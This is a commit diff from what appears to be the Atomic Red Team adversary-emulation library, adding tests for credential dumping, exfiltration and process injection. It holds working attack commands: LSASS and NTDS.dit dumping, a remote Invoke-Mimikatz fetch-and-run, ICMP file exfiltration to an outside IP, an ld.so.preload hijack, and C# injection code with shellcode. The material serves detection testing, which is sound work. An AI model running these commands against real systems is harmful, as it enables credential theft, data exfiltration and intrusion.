jekyll-seo-tag (2.4.0)
jekyll-seo-tag (2.5.0)
jekyll (~> 3.3)
jekyll-sitemap (1.2.0)
jekyll (~> 3.3)
@@ -192,42 +192,41 @@ GEM
jekyll (~> 3.3)
jekyll-watch (2.1.2)
listen (~> 3.0)
jemoji (0.9.0)
activesupport (~> 4.0, >= 4.2.9)
jemoji (0.10.1)
gemoji (~> 3.0)
html-pipeline (~> 2.2)
jekyll (~> 3.0)
kramdown (1.16.2)
kramdown (1.17.0)
liquid (4.0.0)
listen (3.1.5)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
ruby_dep (~> 1.2)
mercenary (0.3.6)
mini_portile2 (2.3.0)
minima (2.4.1)
mini_portile2 (2.4.0)
minima (2.5.0)
jekyll (~> 3.5)
jekyll-feed (~> 0.9)
jekyll-seo-tag (~> 2.1)
minitest (5.11.3)
multipart-post (2.0.0)
nokogiri (1.8.2)
mini_portile2 (~> 2.3.0)
octokit (4.9.0)
nokogiri (1.10.1)
mini_portile2 (~> 2.4.0)
octokit (4.13.0)
sawyer (~> 0.8.0, >= 0.5.3)
pathutil (0.16.2)
forwardable-extended (~> 2.6)
public_suffix (2.0.5)
rb-fsevent (0.10.3)
rb-inotify (0.9.10)
ffi (>= 0.5.0, < 2)
rb-inotify (0.10.0)
ffi (~> 1.0)
rouge (2.2.1)
ruby-enum (0.7.2)
i18n
ruby_dep (1.5.0)
rubyzip (1.2.2)
safe_yaml (1.0.4)
sass (3.7.2)
sass (3.7.3)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
rb-fsevent (~> 0.9, >= 0.9.4)
@@ -238,11 +237,11 @@ GEM
terminal-table (1.8.0)
unicode-display_width (~> 1.1, >= 1.1.1)
thread_safe (0.3.6)
typhoeus (1.3.0)
typhoeus (1.3.1)
ethon (>= 0.9.0)
tzinfo (1.2.5)
thread_safe (~> 0.1)
unicode-display_width (1.4.0)
unicode-display_width (1.4.1)
PLATFORMS
ruby
atomic_red_team/enterprise-attack.json
+126978 -93881
View File
File diff suppressed because one or more lines are too long
atomics/T1003/T1003.md
+56 -8
View File
@@ -115,6 +115,7 @@ The following tools can be used to enumerate credentials:
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* <code>procdump -ma lsass.exe lsass_dump</code>
Locally, mimikatz can be run:
@@ -150,6 +151,10 @@ The /proc filesystem on Linux contains a great deal of information regarding the
- [Atomic Test #8 - Dump Active Directory Database with NTDSUtil](#atomic-test-8---dump-active-directory-database-with-ntdsutil)
- [Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit](#atomic-test-9---create-volume-shadow-copy-with-ntdsdit)
- [Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-10---copy-ntdsdit-from-volume-shadow-copy)
<br/>
@@ -162,7 +167,7 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1|
#### Run it with `powershell`!
```
@@ -219,7 +224,7 @@ reg save HKLM\security security
<br/>
## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
**Supported Platforms:** Windows
@@ -238,7 +243,7 @@ procdump.exe -accepteula -ma lsass.exe #{output_file}
<br/>
## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
@@ -246,11 +251,11 @@ Manager and administrative permissions.
#### Run it with these steps!
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
@@ -261,7 +266,7 @@ Manager and administrative permissions.
<br/>
## Atomic Test #7 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
**Supported Platforms:** Windows
@@ -287,8 +292,8 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
<br/>
## Atomic Test #8 - Dump Active Directory Database with NTDSUtil
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
**Supported Platforms:** Windows
@@ -304,3 +309,46 @@ subsequent domain controllers without the need of network-based replication.
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
```
<br/>
<br/>
## Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
#### Run it with `command_prompt`!
```
vssadmin.exe create shadow /for=#{drive_letter}
```
<br/>
<br/>
## Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1|
| extract_path | Path for extracted NTDS.dit | Path | C:\Extract|
#### Run it with `command_prompt`!
```
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
```
<br/>
atomics/T1003/T1003.yaml
+49 -9
View File
@@ -12,7 +12,7 @@ atomic_tests:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
executor:
name: powershell
command: |
@@ -58,7 +58,7 @@ atomic_tests:
- name: Dump LSASS.exe Memory using ProcDump
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
supported_platforms:
- windows
@@ -74,7 +74,7 @@ atomic_tests:
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
@@ -82,11 +82,11 @@ atomic_tests:
name: manual
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
@@ -95,7 +95,7 @@ atomic_tests:
- name: Offline Credential Theft With Mimikatz
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
supported_platforms:
- windows
@@ -118,8 +118,8 @@ atomic_tests:
- name: Dump Active Directory Database with NTDSUtil
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
supported_platforms:
- windows
@@ -131,4 +131,44 @@ atomic_tests:
executor:
name: command_prompt
command: |
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
- name: Create Volume Shadow Copy with NTDS.dit
description: |
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
supported_platforms:
- windows
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
default: "C:"
executor:
name: command_prompt
command: |
vssadmin.exe create shadow /for=#{drive_letter}
- name: Copy NTDS.dit from Volume Shadow Copy
description: |
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
supported_platforms:
- windows
input_arguments:
vsc_name:
description: Name of Volume Shadow Copy
type: String
default: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
extract_path:
description: Path for extracted NTDS.dit
type: Path
default: C:\Extract
executor:
name: command_prompt
command: |
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
atomics/T1005/T1005.md
+30
View File
@@ -0,0 +1,30 @@
# T1005 - Data from Local System
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1005)
<blockquote>Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.
Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Search macOS Safari Cookies](#atomic-test-1---search-macos-safari-cookies)
<br/>
## Atomic Test #1 - Search macOS Safari Cookies
This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.
**Supported Platforms:** macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| search_string | String to search Safari cookies to find. | string | coinbase|
#### Run it with `sh`!
```
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
```
<br/>
atomics/T1005/T1005.yaml
+23
View File
@@ -0,0 +1,23 @@
---
attack_technique: T1005
display_name: Data from Local System
atomic_tests:
- name: Search macOS Safari Cookies
description: |
This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.
supported_platforms:
- macos
input_arguments:
search_string:
description: String to search Safari cookies to find.
type: string
default: coinbase
executor:
name: sh
command: |
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
atomics/T1018/T1018.md
+4 -4
View File
@@ -1,18 +1,18 @@
# T1018 - Remote System Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1018)
<blockquote>Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
<blockquote>Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems.
### Windows
Examples of tools and commands that acquire this information include "ping" or "net view" using [Net](https://attack.mitre.org/software/S0039).
Examples of tools and commands that acquire this information include "ping" or "net view" using [Net](https://attack.mitre.org/software/S0039). The contents of the <code>C:\Windows\System32\Drivers\etc\hosts</code> file can be viewed to gain insight into the existing hostname to IP mappings on the system.
### Mac
Specific to Mac, the <code>bonjour</code> protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems.
Specific to Mac, the <code>bonjour</code> protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the <code>/etc/hosts</code> file can be viewed to gain insight into existing hostname to IP mappings on the system.
### Linux
Utilities such as "ping" and others can be used to gather information about remote systems.</blockquote>
Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the <code>/etc/hosts</code> file can be viewed to gain insight into existing hostname to IP mappings on the system.</blockquote>
## Atomic Tests
atomics/T1022/T1022.md
+62 -2
View File
@@ -6,12 +6,18 @@ Other exfiltration techniques likely apply as well to transfer the information o
## Atomic Tests
- [Atomic Test #1 - Data Encrypted](#atomic-test-1---data-encrypted)
- [Atomic Test #1 - Data Encrypted with zip and gpg](#atomic-test-1---data-encrypted-with-zip-and-gpg)
- [Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar](#atomic-test-2---compress-data-and-lock-with-password-for-exfiltration-with-winrar)
- [Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip](#atomic-test-3---compress-data-and-lock-with-password-for-exfiltration-with-winzip)
- [Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip](#atomic-test-4---compress-data-and-lock-with-password-for-exfiltration-with-7zip)
<br/>
## Atomic Test #1 - Data Encrypted
## Atomic Test #1 - Data Encrypted with zip and gpg
Encrypt data for exiltration
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
@@ -29,3 +35,57 @@ gpg -c /tmp/victim-gpg.txt
ls -l
```
<br/>
<br/>
## Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar
Note: Requires winrar installation
rar a -p"blue" hello.rar (VARIANT)
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
rar a -hp"blue" hello.rar
dir
```
<br/>
<br/>
## Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip
Note: Requires winzip installation
wzzip sample.zip -s"blueblue" *.txt (VARIANT)
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
path=%path%;"C:\Program Files (x86)\winzip"
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
winzip32 -min -a -s"hello" archive.zip *
dir
```
<br/>
<br/>
## Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip
Note: Requires 7zip installation
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
7z a archive.7z -pblue
dir
```
<br/>
atomics/T1022/T1022.yaml
+46 -2
View File
@@ -3,10 +3,9 @@ attack_technique: T1022
display_name: Data Encrypted
atomic_tests:
- name: Data Encrypted
- name: Data Encrypted with zip and gpg
description: |
Encrypt data for exiltration
supported_platforms:
- macos
- centos
@@ -24,3 +23,48 @@ atomic_tests:
gpg -c /tmp/victim-gpg.txt
<enter passphrase and confirm>
ls -l
- name: Compress Data and lock with password for Exfiltration with winrar
description: |
Note: Requires winrar installation
rar a -p"blue" hello.rar (VARIANT)
supported_platforms:
- windows
executor:
name: command_prompt
command: |
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
rar a -hp"blue" hello.rar
dir
- name: Compress Data and lock with password for Exfiltration with winzip
description: |
Note: Requires winzip installation
wzzip sample.zip -s"blueblue" *.txt (VARIANT)
supported_platforms:
- windows
executor:
name: command_prompt
command: |
path=%path%;"C:\Program Files (x86)\winzip"
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
winzip32 -min -a -s"hello" archive.zip *
dir
- name: Compress Data and lock with password for Exfiltration with 7zip
description: |
Note: Requires 7zip installation
supported_platforms:
- windows
executor:
name: command_prompt
command: |
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
7z a archive.7z -pblue
dir
atomics/T1036/T1036.md
+2 -1
View File
@@ -2,8 +2,9 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1036)
<blockquote>Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs. This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.
One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.
A third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. 
### Windows
In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
atomics/T1040/T1040.md
+1 -1
View File
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1040)
<blockquote>Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.</blockquote>
atomics/T1048/T1048.md
+21
View File
@@ -10,6 +10,8 @@
- [Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP](#atomic-test-3---exfiltration-over-alternative-protocol---http)
- [Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)
<br/>
@@ -80,3 +82,22 @@ A firewall rule (iptables or firewalld) will be needed to allow exfiltration on
<br/>
<br/>
## Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP
Exfiltration of specified file over ICMP protocol.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe|
| ip_address | Destination IP address where the data should be sent. | String | 1.1.1.1|
#### Run it with `powershell`!
```
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
```
<br/>
atomics/T1048/T1048.yaml
+22
View File
@@ -91,3 +91,25 @@ atomic_tests:
3. To retrieve the data from an adversary system:
wget http://VICTIM_IP:1337/victim-file.txt
- name: Exfiltration Over Alternative Protocol - ICMP
description: |
Exfiltration of specified file over ICMP protocol.
supported_platforms:
- windows
input_arguments:
input_file:
description: Path to file to be exfiltrated.
type: Path
default: C:\Windows\System32\notepad.exe
ip_address:
description: Destination IP address where the data should be sent.
type: String
default: 1.1.1.1
executor:
name: powershell
command: |
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
atomics/T1055/T1055.md
+47
View File
@@ -29,6 +29,10 @@ Malware commonly utilizes process injection to access system resources through w
- [Atomic Test #2 - Process Injection via PowerSploit](#atomic-test-2---process-injection-via-powersploit)
- [Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload](#atomic-test-3---shared-library-injection-via-etcldsopreload)
- [Atomic Test #4 - Process Injection via C#](#atomic-test-4---process-injection-via-c)
<br/>
@@ -68,3 +72,46 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/
Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
```
<br/>
<br/>
## Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload
This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
**Supported Platforms:** Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_shared_library | Path to a shared library object | Path | /tmp/evil_module.so|
#### Run it with `bash`!
```
echo #{path_to_shared_library} > /etc/ld.so.preload
```
<br/>
<br/>
## Atomic Test #4 - Process Injection via C#
Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
1. Process injection
2. ApcInjectionAnyProcess
3. ApcInjectionNewProcess
4. IatInjection
5. ThreadHijack
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_binary | Output Binary | Path | T1055.exe|
#### Run it with `command_prompt`!
```
.\bin\#{exe_binary}
```
<br/>
atomics/T1055/T1055.yaml
+38
View File
@@ -44,3 +44,41 @@ atomic_tests:
name: powershell
command: |
Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
- name: Shared Library Injection via /etc/ld.so.preload
description: |
This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
supported_platforms:
- linux
input_arguments:
path_to_shared_library:
description: Path to a shared library object
type: Path
default: /tmp/evil_module.so
executor:
name: bash
command: |
echo #{path_to_shared_library} > /etc/ld.so.preload
- name: Process Injection via C#
description: |
Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
1. Process injection
2. ApcInjectionAnyProcess
3. ApcInjectionNewProcess
4. IatInjection
5. ThreadHijack
supported_platforms:
- windows
input_arguments:
exe_binary:
description: Output Binary
type: Path
default: T1055.exe
executor:
name: command_prompt
command: |
.\bin\#{exe_binary}
atomics/T1055/bin/T1055.exe
Executable
BIN
View File
Binary file not shown.
atomics/T1055/src/T1055.cs
+1147
View File
@@ -0,0 +1,1147 @@
//Atomic Process Injection Tests
//xref: https://github.com/pwndizzle/c-sharp-memory-injection
// https://github.com/peterferrie/win-exec-calc-shellcode
// To run:
// 1. Compile code - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:..\bin\T1055.exe T1055.cs
//
using System;
using System.Reflection;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.IO;
using System.IO.Compression;
using System.Collections.Generic;
using System.ComponentModel;
using System.Text;
public class ProcessInject
{
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead);
[DllImport("kernel32.dll")]
static extern IntPtr CreateRemoteThread(IntPtr hProcess,
IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
// privileges
const int PROCESS_CREATE_THREAD = 0x0002;
const int PROCESS_QUERY_INFORMATION = 0x0400;
const int PROCESS_VM_OPERATION = 0x0008;
const int PROCESS_VM_WRITE = 0x0020;
const int PROCESS_VM_READ = 0x0010;
// used for memory allocation
const uint MEM_COMMIT = 0x00001000;
const uint MEM_RESERVE = 0x00002000;
const uint PAGE_READWRITE = 4;
public static int Inject()
{
// Get process id
Console.WriteLine("Get process by name...");
System.Diagnostics.Process.Start("notepad");
Process targetProcess = Process.GetProcessesByName("notepad")[0];
// Get handle of the process - with required privileges
IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
// Get address of LoadLibraryA and store in a pointer
IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
// Path to dll that will be injected
string dllName = @"C:\AtomicRedTeam\atomics\T1055\bin\w64-exec-calc-shellcode.dll";
// Allocate memory for dll path and store pointer
IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Write path of dll to memory
UIntPtr bytesWritten;
bool resp1 = WriteProcessMemory(procHandle, allocMemAddress, System.Text.Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
// Read contents of memory
int bytesRead = 0;
byte[] buffer = new byte[24];
ReadProcessMemory(procHandle, allocMemAddress, buffer, buffer.Length, ref bytesRead);
Console.WriteLine("Data in memory: " + System.Text.Encoding.UTF8.GetString(buffer));
// Create a thread that will call LoadLibraryA with allocMemAddress as argument
CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero);
return 0;
}
}
public class ApcInjectionAnyProcess
{
public static void Inject()
{
byte[] shellcode = new byte[112] {
0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
};
// Open process. "explorer" is a good target due to the large number of threads which will enter alertable state
Process targetProcess = Process.GetProcessesByName("notepad")[0];
